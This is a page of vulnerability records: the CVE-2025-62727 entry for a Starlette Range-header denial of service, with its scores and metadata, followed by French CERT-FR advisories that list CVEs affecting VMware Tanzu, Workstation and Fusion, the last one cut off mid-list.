Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2025-62727 (GCVE-0-2025-62727)
Vulnerability from cvelistv5 – Published: 2025-10-28 20:14 – Updated: 2025-11-04 17:41
VLAI?
EPSS
Title
Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse
Summary
Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette's FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial‑of‑service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.
Severity ?
7.5 (High)
CWE
- CWE-407 - Inefficient Algorithmic Complexity
Assigner
References
4 references
| URL | Tags |
|---|---|
| https://github.com/Kludex/starlette/security/advi… | x_refsource_CONFIRM |
| https://github.com/Kludex/starlette/commit/4ea6e2… | x_refsource_MISC |
| https://github.com/Kludex/starlette/commit/69ed26… | x_refsource_MISC |
| https://github.com/Kludex/starlette/releases/tag/0.49.1 | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-62727",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-28T20:36:34.130234Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-28T20:36:49.189Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "starlette",
"vendor": "Kludex",
"versions": [
{
"status": "affected",
"version": "\u003e= 0.39.0, \u003c 0.49.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-407",
"description": "CWE-407: Inefficient Algorithmic Complexity",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-04T17:41:42.316Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8"
},
{
"name": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5"
},
{
"name": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c"
},
{
"name": "https://github.com/Kludex/starlette/releases/tag/0.49.1",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/Kludex/starlette/releases/tag/0.49.1"
}
],
"source": {
"advisory": "GHSA-7f5h-v6xp-fcq8",
"discovery": "UNKNOWN"
},
"title": "Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-62727",
"datePublished": "2025-10-28T20:14:53.655Z",
"dateReserved": "2025-10-20T19:41:22.742Z",
"dateUpdated": "2025-11-04T17:41:42.316Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2025-62727",
"date": "2026-05-24",
"epss": "0.00104",
"percentile": "0.27836"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2025-62727\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-28T21:15:40.447\",\"lastModified\":\"2025-11-04T18:16:45.480\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\u2011of\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-407\"}]}],\"references\":[{\"url\":\"https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/releases/tag/0.49.1\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-62727\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-28T20:36:34.130234Z\"}}}], \"references\": [{\"url\": \"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-28T20:36:44.968Z\"}}], \"cna\": {\"title\": \"Starlette vulnerable to O(n^2) DoS via Range header merging in starlette.responses.FileResponse\", \"source\": {\"advisory\": \"GHSA-7f5h-v6xp-fcq8\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"Kludex\", \"product\": \"starlette\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 0.39.0, \u003c 0.49.1\"}]}], \"references\": [{\"url\": \"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\", \"name\": \"https://github.com/Kludex/starlette/security/advisories/GHSA-7f5h-v6xp-fcq8\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5\", \"name\": \"https://github.com/Kludex/starlette/commit/4ea6e22b489ec388d6004cfbca52dd5b147127c5\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c\", \"name\": \"https://github.com/Kludex/starlette/commit/69ed26a85956ef4bd0161807eb27abf49be7cd3c\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/Kludex/starlette/releases/tag/0.49.1\", \"name\": \"https://github.com/Kludex/starlette/releases/tag/0.49.1\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Starlette is a lightweight ASGI framework/toolkit. Starting in version 0.39.0 and prior to version 0.49.1 , an unauthenticated attacker can send a crafted HTTP Range header that triggers quadratic-time processing in Starlette\u0027s FileResponse Range parsing/merging logic. This enables CPU exhaustion per request, causing denial\\u2011of\\u2011service for endpoints serving files (e.g., StaticFiles or any use of FileResponse). This vulnerability is fixed in 0.49.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-407\", \"description\": \"CWE-407: Inefficient Algorithmic Complexity\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-11-04T17:41:42.316Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-62727\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-04T17:41:42.316Z\", \"dateReserved\": \"2025-10-20T19:41:22.742Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-28T20:14:53.655Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
CERTFR-2025-AVI-1138
Vulnerability from certfr_avis - Published: 2025-12-26 - Updated: 2025-12-26
De multiples vulnérabilités ont été découvertes dans VMware Tanzu Platform. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Platform | AI Services pour Tanzu Platform versions antérieures à 10.3.2 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "AI Services pour Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.2",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2025-62426",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62426"
},
{
"name": "CVE-2025-61727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61727"
},
{
"name": "CVE-2025-62372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62372"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2025-31133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31133"
},
{
"name": "CVE-2025-58188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2025-62164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62164"
},
{
"name": "CVE-2025-52881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52881"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2025-66448",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66448"
},
{
"name": "CVE-2025-61723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2025-61725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2025-52565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52565"
},
{
"name": "CVE-2025-34351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-34351"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2023-48022",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48022"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2025-62593",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62593"
},
{
"name": "CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
}
],
"initial_release_date": "2025-12-26T00:00:00",
"last_revision_date": "2025-12-26T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-1138",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-12-26T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans VMware Tanzu Platform. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans VMware Tanzu Platform",
"vendor_advisories": [
{
"published_at": "2025-12-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36640",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36640"
}
]
}
CERTFR-2025-AVI-1138
Vulnerability from certfr_avis - Published: 2025-12-26 - Updated: 2025-12-26
De multiples vulnérabilités ont été découvertes dans VMware Tanzu Platform. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Platform | AI Services pour Tanzu Platform versions antérieures à 10.3.2 |
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "AI Services pour Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.2",
"product": {
"name": "Tanzu Platform",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2025-58185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58185"
},
{
"name": "CVE-2025-62426",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62426"
},
{
"name": "CVE-2025-61727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61727"
},
{
"name": "CVE-2025-62372",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62372"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2025-31133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31133"
},
{
"name": "CVE-2025-58188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58188"
},
{
"name": "CVE-2025-4674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4674"
},
{
"name": "CVE-2022-29526",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29526"
},
{
"name": "CVE-2025-62164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62164"
},
{
"name": "CVE-2025-52881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52881"
},
{
"name": "CVE-2025-61724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61724"
},
{
"name": "CVE-2025-66448",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66448"
},
{
"name": "CVE-2025-61723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61723"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2025-61725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61725"
},
{
"name": "CVE-2025-22874",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22874"
},
{
"name": "CVE-2025-47912",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47912"
},
{
"name": "CVE-2025-52565",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52565"
},
{
"name": "CVE-2025-34351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-34351"
},
{
"name": "CVE-2025-58186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58186"
},
{
"name": "CVE-2025-58187",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58187"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2023-48022",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-48022"
},
{
"name": "CVE-2025-48924",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48924"
},
{
"name": "CVE-2025-62593",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62593"
},
{
"name": "CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
}
],
"initial_release_date": "2025-12-26T00:00:00",
"last_revision_date": "2025-12-26T00:00:00",
"links": [],
"reference": "CERTFR-2025-AVI-1138",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-12-26T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans VMware Tanzu Platform. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans VMware Tanzu Platform",
"vendor_advisories": [
{
"published_at": "2025-12-25",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 36640",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36640"
}
]
}
CERTFR-2026-AVI-0218
Vulnerability from certfr_avis - Published: 2026-02-26 - Updated: 2026-02-26
De multiples vulnérabilités ont été découvertes dans les produits VMware. Certaines d'entre elles permettent à un attaquant de provoquer un déni de service à distance, une atteinte à la confidentialité des données et un contournement de la politique de sécurité.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| VMware | Tanzu Kubernetes Runtime | Platform Services pour Tanzu Platform versions antérieures à 10.3.5 | ||
| VMware | Tanzu Kubernetes Runtime | Tanzu Hub versions antérieures à 10.3.5 | ||
| VMware | Tanzu Data Intelligence | Tanzu pour Postgres versions 16.x antérieures à 16.12.0 | ||
| VMware | Tanzu Data Intelligence | Tanzu pour Postgres versions antérieures à 4.3.2 sur Kubernetes | ||
| VMware | Tanzu Data Intelligence | Tanzu pour Postgres versions 18.x antérieures à 18.2.0 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Noble) versions antérieures à 1.238.x | ||
| VMware | Workstation | Workstation versions antérieures à 25H2u1 | ||
| VMware | Fusion | Fusion versions antérieures à 25H2u1 sur MacOS | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Ubuntu Jammy) versions antérieures à 1.1065.x | ||
| VMware | Tanzu Data Intelligence | Tanzu pour Postgres versions 15.x antérieures à 15.16.0 | ||
| VMware | Tanzu Kubernetes Runtime | Stemcells (Windows) versions antérieures à 2019.95.x | ||
| VMware | Tanzu Data Intelligence | Tanzu pour Postgres versions 17.x antérieures à 17.8.0 | ||
| VMware | Tanzu Data Intelligence | Tanzu pour Postgres versions antérieures à 14.21.0 |
References
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Platform Services pour Tanzu Platform versions ant\u00e9rieures \u00e0 10.3.5",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu Hub versions ant\u00e9rieures \u00e0 10.3.5",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu pour Postgres versions 16.x ant\u00e9rieures \u00e0 16.12.0",
"product": {
"name": "Tanzu Data Intelligence",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu pour Postgres versions ant\u00e9rieures \u00e0 4.3.2 sur Kubernetes",
"product": {
"name": "Tanzu Data Intelligence",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu pour Postgres versions 18.x ant\u00e9rieures \u00e0 18.2.0",
"product": {
"name": "Tanzu Data Intelligence",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Noble) versions ant\u00e9rieures \u00e0 1.238.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Workstation versions ant\u00e9rieures \u00e0 25H2u1",
"product": {
"name": "Workstation",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Fusion versions ant\u00e9rieures \u00e0 25H2u1 sur MacOS",
"product": {
"name": "Fusion",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Ubuntu Jammy) versions ant\u00e9rieures \u00e0 1.1065.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu pour Postgres versions 15.x ant\u00e9rieures \u00e0 15.16.0",
"product": {
"name": "Tanzu Data Intelligence",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Stemcells (Windows) versions ant\u00e9rieures \u00e0 2019.95.x",
"product": {
"name": "Tanzu Kubernetes Runtime",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu pour Postgres versions 17.x ant\u00e9rieures \u00e0 17.8.0",
"product": {
"name": "Tanzu Data Intelligence",
"vendor": {
"name": "VMware",
"scada": false
}
}
},
{
"description": "Tanzu pour Postgres versions ant\u00e9rieures \u00e0 14.21.0",
"product": {
"name": "Tanzu Data Intelligence",
"vendor": {
"name": "VMware",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2019-25013",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-25013"
},
{
"name": "CVE-2017-9937",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9937"
},
{
"name": "CVE-2025-6395",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6395"
},
{
"name": "CVE-2026-22722",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22722"
},
{
"name": "CVE-2023-52356",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52356"
},
{
"name": "CVE-2013-4235",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-4235"
},
{
"name": "CVE-2025-8715",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8715"
},
{
"name": "CVE-2017-3613",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3613"
},
{
"name": "CVE-2021-22898",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-22898"
},
{
"name": "CVE-2025-38490",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38490"
},
{
"name": "CVE-2025-37850",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37850"
},
{
"name": "CVE-2025-66865",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66865"
},
{
"name": "CVE-2022-35252",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35252"
},
{
"name": "CVE-2005-0602",
"url": "https://www.cve.org/CVERecord?id=CVE-2005-0602"
},
{
"name": "CVE-2025-61730",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61730"
},
{
"name": "CVE-2025-38485",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38485"
},
{
"name": "CVE-2025-22026",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22026"
},
{
"name": "CVE-2025-39987",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39987"
},
{
"name": "CVE-2025-62727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62727"
},
{
"name": "CVE-2015-4789",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-4789"
},
{
"name": "CVE-2025-38579",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38579"
},
{
"name": "CVE-2025-37761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37761"
},
{
"name": "CVE-2025-21861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21861"
},
{
"name": "CVE-2025-37865",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37865"
},
{
"name": "CVE-2025-38328",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38328"
},
{
"name": "CVE-2026-21933",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21933"
},
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2024-7006",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7006"
},
{
"name": "CVE-2026-21932",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21932"
},
{
"name": "CVE-2023-3316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3316"
},
{
"name": "CVE-2025-15282",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15282"
},
{
